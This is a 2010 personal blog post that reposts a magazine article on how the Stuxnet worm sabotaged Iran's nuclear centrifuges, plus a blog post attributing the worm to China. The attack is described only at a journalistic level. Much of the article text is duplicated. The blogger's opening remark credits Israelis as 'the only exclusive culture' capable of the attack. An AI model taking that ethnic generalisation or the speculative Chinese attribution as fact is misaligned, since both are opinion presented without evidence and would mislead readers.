CYBERWARFARE - An International Event with Far Reaching Implications

[work in progress] THIS ARTICLE HAS ENORMOUS IMPLICATIONS FOR LARGE
ORGANZATIONS THAT ARE DEPENDENT ON COMPUTER TECHNOLOGY.

Like........financial institutions; governements, health systems, oil companies, traffic
management systems (airlines, trains, etc), etc, etc, etc.

most people are not aware at the accelerating rapid pace of our  dependence on highly intelligent robots that will control major parts of our economy;  robots that someday in the next 20 years will be smarter that humans.
my guess is that the israelis developed stuxnet.  they are the only exclusive culture smart enough and disciplined enough to pull it off.

The first article appeared in the Weekly Standard; the  second arrticle is from Forbes Blog, where the author believes that the Chinese developed the Worm.

if you are interested or into security, you ought to dwell on what just happened in Iran.

joebrophy

How the Worm Turned
Stuxnet versus the Iranian nuclear program.
Dec 13, 2010, Vol. 16, No. 13 • By JONATHAN V. LAST; Weekly Stanard
Last week Mahmoud Ahmadinejad acknowledged that Iran’s uranium enrichment program had suffered a setback: “They were able to disable on a limited basis some of
our centrifuges by software installed in electronic equipment,” the Iranian president told reporters. This was something of an understatement. Iran’s uranium enrichment program
appears to have been hobbled for the better part of a year, its technical resources drained and its human resources cast into disarray. The “software” in question was a computer
worm called Stuxnet, which is already being viewed as the greatest triumph in the short history of cyberwarfare.
Stuxnet first surfaced on June 17 of this year when a digital security company in Minsk, VirusBlokAda, discovered it on a computer belonging to one of its Iranian clients. It
quickly became clear that Stuxnet was not an ordinary piece of malware.

Stuxnet is not a virus, but a worm. Viruses piggyback on programs already resident in a computer. Worms are programs in their own right, which hide within a computer and
stealthily propagate themselves onto other machines. After nearly a month of study, cybersecurity engineers determined that Stuxnet was designed to tamper with industrial
systems built by the German firm Siemens by overriding their supervisory control and data acquisition (SCADA) protocols. Which is to say that, unlike most malware, which
exists to manipulate merely virtual operations, Stuxnet would have real-world consequences: It wanted to commandeer the workings of a large, industrial facility, like a
power plant, or a dam, or a factory. Exactly what kind of facility was still a mystery.   
CONTINUED BELOW
Related Stories
*    Chávez Tries to Go Nuclear
*    Hugo Chávez's Military Buildup and Iranian Ties
*    Does Stuxnet Mean Cyberwar?
*    A 'Perfect Man' at the U.N.
*    Diplomatic Illusions
More by Jonathan V. Last
*    Kelo Endures
*    Ted, Teddy, and the Natalist Impulse
*    The Steelers Stand Up for Flight 93
*    Stuxnet Update
*    American Narcissus IV: A New Hope
end article-break
From the beginning, everything about Stuxnet was anomalous. Worms that tampered with SCADA are not unheard of, but are exceptionally rare. And as a physical piece of
code, Stuxnet was enormous—weighing in at half a megabyte, it dwarfed the average piece of malware by many multiples. Finally, there was its infection radius. Stuxnet
found its way onto roughly 100,000 computers worldwide; 60 percent of these were in Iran.
From the beginning, everything about Stuxnet was anomalous. Worms that tampered with SCADA are not unheard of, but are exceptionally rare. And as a physical piece of
code, Stuxnet was enormous—weighing in at half a megabyte, it dwarfed the average piece of malware by many multiples. Finally, there was its infection radius. Stuxnet
found its way onto roughly 100,000 computers worldwide; 60 percent of these were in Iran.
As a work of engineering, Stuxnet’s power and elegance made it even more intriguing. Most industrial systems are run on computers which use Microsoft’s Windows operating
system. Hackers constantly probe software for what are known as “zero day” vulnerabilities, weak points in the code never foreseen by the original programmers. On a sophisticated and ubiquitous piece of software such as Windows, discovering even a single zero day vulnerability is extremely uncommon. The makers of Stuxnet found, and
utilized, four of them. No one in cybersecurity had ever seen anything like it.The worm gained initial access to a system through an ordinary USB drive. Picture what
happens when you plug a flash drive into your computer. The machine performs a number of tasks automatically; one of them is pulling up icons to be displayed on your screen,
representing the data on the drive. On an infected USB drive, Stuxnet exploited this routine to pull the worm onto the computer.The challenge is that once on the machine, the worm becomes visible to security
protocols, which constantly query files looking for malware. To disguise itself, Stuxnet installed what’s called a “rootkit”—a piece of code that intercepts security queries and sends back false “safe” messages, indicating that the worm is innocuous.
But installing a rootkit requires using drivers, of which Windows machines are well trained to be suspicious. Windows requires that all drivers provide verification that
they’re on the up-and-up through presentation of a secure digital signature. These digital keys are closely guarded secrets. Stuxnet’s malicious drivers presented genuine signatures
from two genuine computer companies, Realtek Semiconductor and JMichron Technologies. Both firms have offices in the same facility, Hsinchu Science Park, in Taiwan. Either by electronic trickery or a brick-and-mortar heist job, the creators of
Stuxnet stole these keys—and in a sophisticated enough manner that no one knew they
had been compromised.
So to recap: The security keys enable the drivers, which allow the installation of the
rootkit, which hides the worm that was delivered by the corrupt USB drive. Stuxnet’s
next job was to propagate itself efficiently but quietly. Whenever another USB drive was
inserted into an infected computer, it became infected, too. But in order to reduce
traceability, Stuxnet allowed each infected USB drive to pass the worm onto only three
computers.
Stuxnet spread in other ways, too. It was not designed to propagate over the Internet at
large, but could move across local networks using print spoolers. In any group of
computers which shared a printer, when one computer became infected, Stuxnet quickly
crawled through the printer to contaminate the others. Once it reached a computer with
access to the Internet, it began communicating with command-and-control servers
located in Denmark and Malaysia. (Whoever was running the operation took these servers
offline after Stuxnet was discovered.) While they were functional, Stuxnet delivered
information it had gathered about the systems it had invaded to the servers and requested
updated versions of itself. Several different versions of Stuxnet have been isolated,
meaning that the programmers were refining the worm, even after it was released.
Finally, there’s the actual payload. Once a resident of a Windows machine, Stuxnet
looked for WinCC and PCS 7 SCADA programs. If the machine had neither of these,
then Stuxnet merely went about the business of spreading itself. But on computers with
one of these two programs, Stuxnet began reprogramming the programmable logic control
(PLC) software and making changes in a piece of code called Operational Block 35. For
months, no one knew exactly what Stuxnet was looking for with this block of code or
what it intended to do once it found it. Three weeks ago, that changed.
As cybersecurity engineer Ralph Langner puts it, Stuxnet was one weapon with two
warheads. The first payload was aimed at the Siemens S7-417 controller at Iran’s
Bushehr nuclear power plant. The second targeted the Siemens S7-315 controller at the
Natanz centrifuge operation, where uranium is processed and enriched. At Bushehr,
Stuxnet likely attempted to degrade the facility’s steam turbine, with unknown results.
But the attack on Natanz seems to have succeeded brilliantly.
Once again, Stuxnet’s design was unexpectedly elegant. With control of the centrifuge
system at Natanz, the worm could have triggered a single, catastrophic incident. Instead,
Stuxnet took over the centrifuge’s frequency converters during the course of everyday
operation and induced tiny bursts of speed in the machinery, followed by abrupt
decelerations. These speed changes stressed the centrifuge’s components. Parts wore out
quickly, centrifuges broke mysteriously. The uranium being processed was corrupted.
And all the while, Stuxnet kept sending normal feedback to the Iranians, telling them
that, from the computer’s standpoint, the system was operating like clockwork. This slow
burn went on for a year, with the Iranians becoming increasingly exasperated by what
looked like sabotage, and smelled like sabotage, but what their computers assured them
was perfectly routine.
In sum, Stuxnet wasted a year’s worth of enrichment efforts at Natanz, ate through
centrifuge components and uranium stores, sowed chaos within Iran’s nuclear program,
and will likely force Iran to spend another year disinfecting its systems before they can
operate at peak levels again. All in all, a successful operation.
Who deserves credit for Stuxnet? There are three possibilities: (1) a lone state actor; (2) a
consortium of states; or (3) a private group. Each of these is at first glance plausible. But
the exploit was even more complicated than it appears on first inspection.
The planning and implementation of Stuxnet involved three layers of complication. First,
there’s the sophistication of the worm itself. Microsoft estimates that the coding of
Stuxnet consumed somewhere in the neighborhood of 10,000 man-work days. With a
team of 30 to 50 programmers, that’s a year or two of effort, at least. Between the
workload, the zero day exploits, and the innovative design of the worm, Stuxnet required
not just time but enormous technical sophistication and sizable financial resources.
On the next level, the creators of Stuxnet needed competency in the more traditional
cloak-and-dagger elements of espionage. The digital verification certificates had to be
stolen from the companies in Taiwan, and the infected USB drives had to be planted on
or around the community of people who worked in the Iranian nuclear program—modern
espionage tradecraft at its best.
The final complication is that vast amounts of expertise in nuclear engineering were
required. It’s not enough to design a worm to infiltrate a nuclear plant—Stuxnet’s
creators had to know (1) what parts of the systems to target, (2) the intricacies of the
systems’ designs, and (3) how to manipulate the systems to achieve the desired effects.
This knowledge base might have been the most difficult to obtain. The world is full of
enterprising computer jocks; there are only so many people who understand exactly how
centrifuges and nuclear reactors work and the minute complexities of Siemens’s S7-315
and S7-417 control systems. It seems unlikely that a private party—a group of rogue
hackers or interested civilians—could amass the requisite competencies in all three of
these areas.
So who was it—the Israelis, the United States, Germany, Russia? Some combination of
the above? We may never know. Given the scope of the operation, it’s amazing that we
understand as much as we already do about Stuxnet. Most prior acts of cyberwarfare
took place in the shadows; Stuxnet is the first serious cyberweapon to be caught in the
wild by civilians. As a result, we’ve witnessed over the last few months an open-source
investigation involving experts in different disciplines from around the world. The techies
will continue to push and prod Stuxnet, trying to understand how it worked—and how
systems can be protected from a similar attack.
Because, in fundamental ways, cyberwar is no different from real war. Innovations can
be copied, and there is always the potential for enemies to turn them to their advantage.
power and elegance made it even more intriguing. Most industrial systems are run on
computers which use Microsoft’s Windows operating system. Hackers constantly probe
software for what are known as “zero day” vulnerabilities, weak points in the code never
foreseen by the original programmers. On a sophisticated and ubiquitous piece of
software such as Windows, discovering even a single zero day vulnerability is extremely
uncommon. The makers of Stuxnet found, and utilized, four of them. No one in
cybersecurity had ever seen anything like it.
The worm gained initial access to a system through an ordinary USB drive. Picture what
happens when you plug a flash drive into your computer. The machine performs a number
of tasks automatically; one of them is pulling up icons to be displayed on your screen,
representing the data on the drive. On an infected USB drive, Stuxnet exploited this
routine to pull the worm onto the computer.
The challenge is that once on the machine, the worm becomes visible to security
protocols, which constantly query files looking for malware. To disguise itself, Stuxnet
installed what’s called a “rootkit”—a piece of code that intercepts security queries and
sends back false “safe” messages, indicating that the worm is innocuous.
But installing a rootkit requires using drivers, of which Windows machines are well
trained to be suspicious. Windows requires that all drivers provide verification that
they’re on the up-and-up through presentation of a secure digital signature. These digital
keys are closely guarded secrets. Stuxnet’s malicious drivers presented genuine signatures
from two genuine computer companies, Realtek Semiconductor and JMichron
Technologies. Both firms have offices in the same facility, Hsinchu Science Park, in
Taiwan. Either by electronic trickery or a brick-and-mortar heist job, the creators of
Stuxnet stole these keys—and in a sophisticated enough manner that no one knew they
had been compromised.
So to recap: The security keys enable the drivers, which allow the installation of the
rootkit, which hides the worm that was delivered by the corrupt USB drive. Stuxnet’s
next job was to propagate itself efficiently but quietly. Whenever another USB drive was
inserted into an infected computer, it became infected, too. But in order to reduce
traceability, Stuxnet allowed each infected USB drive to pass the worm onto only three
computers.
Stuxnet spread in other ways, too. It was not designed to propagate over the Internet at
large, but could move across local networks using print spoolers. In any group of
computers which shared a printer, when one computer became infected, Stuxnet quickly
crawled through the printer to contaminate the others. Once it reached a computer with
access to the Internet, it began communicating with command-and-control servers
located in Denmark and Malaysia. (Whoever was running the operation took these servers
offline after Stuxnet was discovered.) While they were functional, Stuxnet delivered
information it had gathered about the systems it had invaded to the servers and requested
updated versions of itself. Several different versions of Stuxnet have been isolated,
meaning that the programmers were refining the worm, even after it was released.
Finally, there’s the actual payload. Once a resident of a Windows machine, Stuxnet
looked for WinCC and PCS 7 SCADA programs. If the machine had neither of these,
then Stuxnet merely went about the business of spreading itself. But on computers with
one of these two programs, Stuxnet began reprogramming the programmable logic control
(PLC) software and making changes in a piece of code called Operational Block 35. For
months, no one knew exactly what Stuxnet was looking for with this block of code or
what it intended to do once it found it. Three weeks ago, that changed.
As cybersecurity engineer Ralph Langner puts it, Stuxnet was one weapon with two
warheads. The first payload was aimed at the Siemens S7-417 controller at Iran’s
Bushehr nuclear power plant. The second targeted the Siemens S7-315 controller at the
Natanz centrifuge operation, where uranium is processed and enriched. At Bushehr,
Stuxnet likely attempted to degrade the facility’s steam turbine, with unknown results.
But the attack on Natanz seems to have succeeded brilliantly.
Once again, Stuxnet’s design was unexpectedly elegant. With control of the centrifuge
system at Natanz, the worm could have triggered a single, catastrophic incident. Instead,
Stuxnet took over the centrifuge’s frequency converters during the course of everyday
operation and induced tiny bursts of speed in the machinery, followed by abrupt
decelerations. These speed changes stressed the centrifuge’s components. Parts wore out
quickly, centrifuges broke mysteriously. The uranium being processed was corrupted.
And all the while, Stuxnet kept sending normal feedback to the Iranians, telling them
that, from the computer’s standpoint, the system was operating like clockwork. This slow
burn went on for a year, with the Iranians becoming increasingly exasperated by what
looked like sabotage, and smelled like sabotage, but what their computers assured them
was perfectly routine.
In sum, Stuxnet wasted a year’s worth of enrichment efforts at Natanz, ate through
centrifuge components and uranium stores, sowed chaos within Iran’s nuclear program,
and will likely force Iran to spend another year disinfecting its systems before they can
operate at peak levels again. All in all, a successful operation.
Who deserves credit for Stuxnet? There are three possibilities: (1) a lone state actor; (2) a
consortium of states; or (3) a private group. Each of these is at first glance plausible. But
the exploit was even more complicated than it appears on first inspection.
The planning and implementation of Stuxnet involved three layers of complication. First,
there’s the sophistication of the worm itself. Microsoft estimates that the coding of
Stuxnet consumed somewhere in the neighborhood of 10,000 man-work days. With a
team of 30 to 50 programmers, that’s a year or two of effort, at least. Between the
workload, the zero day exploits, and the innovative design of the worm, Stuxnet required
not just time but enormous technical sophistication and sizable financial resources.
On the next level, the creators of Stuxnet needed competency in the more traditional
cloak-and-dagger elements of espionage. The digital verification certificates had to be
stolen from the companies in Taiwan, and the infected USB drives had to be planted on
or around the community of people who worked in the Iranian nuclear program—modern
espionage tradecraft at its best.
The final complication is that vast amounts of expertise in nuclear engineering were
required. It’s not enough to design a worm to infiltrate a nuclear plant—Stuxnet’s
creators had to know (1) what parts of the systems to target, (2) the intricacies of the
systems’ designs, and (3) how to manipulate the systems to achieve the desired effects.
This knowledge base might have been the most difficult to obtain. The world is full of
enterprising computer jocks; there are only so many people who understand exactly how
centrifuges and nuclear reactors work and the minute complexities of Siemens’s S7-315
and S7-417 control systems. It seems unlikely that a private party—a group of rogue
hackers or interested civilians—could amass the requisite competencies in all three of
these areas.
So who was it—the Israelis, the United States, Germany, Russia? Some combination of
the above? We may never know. Given the scope of the operation, it’s amazing that we
understand as much as we already do about Stuxnet. Most prior acts of cyberwarfare
took place in the shadows; Stuxnet is the first serious cyberweapon to be caught in the
wild by civilians. As a result, we’ve witnessed over the last few months an open-source
investigation involving experts in different disciplines from around the world. The techies
will continue to push and prod Stuxnet, trying to understand how it worked—and how
systems can be protected from a similar attack.
Because, in fundamental ways, cyberwar is no different from real war. Innovations can
be copied, and there is always the potential for enemies to turn them to their advantage.


 

_Stuxnet’s Finnish-Chinese Connection
Dec. 14 2010 - 8:07 am | 32,558 views | 1 recommendation | 15 comments
Posted by Jeffrey Carr
Chinese flag

I recently wrote a white paper entitled “Dragons, Tigers, Pearls, and Yellowcake” in which I proposed four alternative scenarios for the Stuxnet worm

other than the commonly held assumption that it was Israel or the U.S. targeting Iran’s Bushehr or Natanz facilities. During the course of my research for

that paper, I uncovered a connection between two of the key players in the Stuxnet drama: Vacon, the Finnish manufacturer of one of two frequency

converter drives targeted by this malware; and RealTek, who’s digital certificate was stolen and used to smooth the way for the worm to be loaded onto

a Windows host without raising any alarms. A third important piece of the puzzle, which I’ll discuss later in this article, directly connects a Chinese

antivirus company which writes their own viruses with the Stuxnet worm.

Most people who have followed the Stuxnet investigation know that the international headquarters for Vacon is in Finland, but surprisingly, Finland isn’t

where Vacon’s frequency converter drives are manufactured. Vacon’s manufacturing plant is actually located in the Peoples Republic of China (PRC)

under the name Vacon Suzhou Drives Co. Ltd., located at 11A, Suchun Industrial Square 428# Xinglong Street, SIP Suzhou 215126 China.

Vacon isn’t the only company involved with Stuxnet that has a Chinese connection. The first genuine digital certificate used by Stuxnet developers was

from RealTek Semiconductor Corp., a Taiwanese company which has a subsidiary in (of all places) Suzhou under the name Realsil Microelectronics,

Inc. (450 Shenhu Road, Suzhou Industrial Park, Suzhou 215021 Jiangsu Province, China).

The question, of course, is what, if anything, does this say about China’s possible role as the source of the Stuxnet worm. There are scenarios under

which China would benefit such as the rare-earths scenario that I presented in my white paper, however there’s a lack of data on mining failures that can

be attributed to Stuxnet. The closest that anyone has come to identifying compromised operations is at Natanz however their centrifuge failures go back

several years according to this February, 2010 report by ISIS, while the earliest Stuxnet sample seen by Symantec’s researchers was June, 2009 and

that’s before it had signed driver files or exploited the remote code execution vulnerability that appeared in January, 2010 and March, 2010 respectively.

Natanz may very well have been the target of an earlier cyber attack, or even multiple attacks, which had nothing to do with Stuxnet.

Does China Benefit By Attacking Natanz?

In 2008, China decided to assist the IAEA inspectors after it learned that Iran was in possession of blueprints to shape uranium metal into warheads,

according to this article in The Telegraph. That same article discloses that Chinese designs for centrifuges were discovered in Iran, supplied via Pakistan’s

AQ Khan.

On April 13, 2010, Beijing reiterated its opposition to Iran’s goal to develop nuclear weapons capabilities while stating that sanctions against Iran would

be counter-productive. In other words, the PRC wanted to support its third largest supplier of oil (after Saudi Arabia and Angola) while at the same time

seeking ways to get Iran to stop its uranium fuel enrichment program. What better way to accomplish that goal than by covertly creating a virus that will

sabotage Natanz’ centrifuges in a way that simulates mechanical failure while overtly supporting the Iranian government by opposing sanctions pushed by

the U.S. It’s both simple and elegant. Even if the worm was discovered before it accomplished its mission, who would blame China, Iran’s strongest ally,

when the most obvious culprits would be Israel and the U.S.?

Reviewing The Evidence

China has an intimate knowledge of Iran’s centrifuges since, according to one source quoted above,  they’re of Chinese design.

China has better access than any other country to manufacturing plans for the Vacon frequency converter drive made by Vacon’s Suzhou facility and

specifically targeted by the Stuxnet worm (along with an Iranian company’s drive). Furthermore, in March 2010, China’s Customs ministry started an

audit at Vacon’s Suzhou facility and took two employees into custody thereby providing further access to Vacon’s manufacturing specifications under

cover of an active investigation.

China has better access than any other country to RealTek’s digital certificates through it’s Realsil office in Suzhou and, secondarily, to JMicron’s office

in Taiwan.

China has direct access to Windows source code, which would explain how a malware team could create 4 key zero day vulnerabilities for Windows

when most hackers find it challenging to develop even one.

There were no instances of Stuxnet infections in the PRC until very late which never made sense to me, particularly when Siemens software is pervasive

throughout China’s power installations. Then, almost as an after-thought and over three months from the time the virus was first discovered, Chinese

media reported one million infections, and here’s where the evidence becomes really interesting.

That report originated with a Chinese antivirus company called Rising International, who we now know colluded with an official in Beijing’s Public

Security Bureau to make announcements encouraging Chinese citizens to download AV software from Rising International (RI) to fight a new virus that

RI had secretly created in its own lab. Considering this new information, RI’s Stuxnet announcement sounds more like a CYA strategy from the worm’s

originators than anything else.

In Summary

The conventional wisdom on which nation state was responsible for the Stuxnet worm has relentlessly pointed the finger at Israel or the United States

almost from day one of the worm’s discovery. No other scenarios were discussed or even considered with the exception of my own conjecture about

India’s INSAT-4b satellite failure and Britain’s Heysham 1 nuclear plant shutdown, and then my white paper proposing 4 additional alternative scenarios;

all of which were my way of trying (and failing) to expand the discussion beyond Israel and Iran. The appeal of a U.S. or Israeli cyber attack against first

Bushehr, then Natanz, was just too good to pass up even though there was no hard evidence and very slim circumstantial evidence to support a case for

either country. The best that Ralph Langner, CEO of Langner Communications (and the leading evangelist for this scenario) could point to was an

obscure Hebrew word for Myrtus and a biblical reference for a date found in the malware that pertained to Persia; both of which could have been

explained in a half dozen alternate ways having nothing to do with either Israel or the U.S.

As far as China goes, I’ve identified 5 distinct ties to Stuxnet that are unique to China as well as provided a rationale for the attack which fits China’s

unique role as Iran’s ally and customer, while opposing Iran’s fuel enrichment plans. There’s still a distinct lack of information on any other facilities that

suffered damage, and no good explanations for why there was such massive collateral damage across dozens of countries if only one or two facilities in

one nation state were the targets however based solely on the known facts, I consider China to be the most likely candidate for Stuxnet’s origin.
___________________________________________________________

Brophy Saturday 18 December 2010 - 7:49 pm | | Brophy Blog

No comments

(optional field)
(optional field)
Remember personal info?
Small print: All html tags except <b> and <i> will be removed from your comment. You can make links by just typing the url or mail-address.